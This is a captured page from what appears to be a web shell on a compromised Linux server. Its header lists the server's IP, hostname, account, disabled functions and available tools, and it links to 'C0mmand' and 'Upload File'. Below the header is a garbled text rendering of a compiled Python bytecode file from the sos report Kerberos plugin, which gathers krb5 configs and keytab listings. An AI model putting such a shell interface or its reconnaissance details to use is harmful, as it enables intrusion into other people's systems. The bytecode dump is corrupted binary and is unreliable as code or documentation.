Server IP : 184.107.3.203 / Your IP : 216.73.216.51 Web Server : Apache System : Linux dedicated2.avenfashion.com.ph 4.18.0-553.40.1.el8_10.x86_64 #1 SMP Mon Feb 10 12:11:18 EST 2025 x86_64 User : adminteladeoro ( 1015) PHP Version : 8.2.28 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/lib/python3.6/site-packages/sos/report/plugins/__pycache__/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
3 ~ �g� � @ sb d dl Z d dlZd dlmZmZmZmZ G dd� de�ZG dd� dee�ZG dd� deee�Z dS ) � N)�Plugin�RedHatPlugin�DebianPlugin�UbuntuPluginc @ s0 e Zd ZdZdZdZdZdZdd� Zd d � Z dS )�Krb5a: This plugin handles the collection of kerberos authentication config files and logging. Users should expect to see their krb5 config(s) in the final archive, along with krb5 logging and `klist` output. kdc configs and acls will also be collected from the distribution-spcecific kdc directory. zKerberos authenticationZkrb5�identity�systemNc C s\ | j dd| j� d�| j� d�dg� | j� | j ddd� | jd | j� d �� | jd� d S )Nz/etc/krb5.confz/etc/krb5.conf.d/*z /kadm5.aclz /kdc.confz/var/log/kadmind.logz/var/log/krb5kdc.logZkerberos_kdc_log)Ztagszklist -ket z/.k5*zklist -ket /etc/krb5.keytab)Z add_copy_spec�kdcdir� collect_kinit�add_cmd_output)�self� r �/usr/lib/python3.6/krb5.py�setup s z Krb5.setupc C s� t j� }d}| j|�r�t|ddd��v}xn|D ]f}tjd|tj�rn|jd�d dd � j� }| j d |� d�� P tjd|tj�r,| j d |� d �� P q,W W dQ R X dS )a) Collect the kinit command output for the system with id_provider "AD" or "IPA" domains. While integrating the Linux M/c with AD the realmd will create a computer object on the AD side. The realmd and AD restrict the Hostname/SPN to 15 Characters. z/etc/sssd/sssd.conf�rzutf-8)�encodingz\s*id_provider\s*=\s*ad�.r N� zMKRB5_TRACE=/dev/stdout kinit -k 'z$'z\s*id_provider\s*=\s*ipa�') �socketZgetfqdnZpath_isfile�open�re�match� IGNORECASE�split�upperr )r ZhostnameZ sssd_conf�f�liner r r r + s zKrb5.collect_kinit)r r ) �__name__� __module__�__qualname__�__doc__Z short_descZplugin_nameZprofilesr r r r r r r r s r c @ s e Zd ZdZdZdS )� RedHatKrb5� krb5-libs�krb5-serverz/var/kerberos/krb5kdcN)r# r$ )r r r �packagesr r r r r r"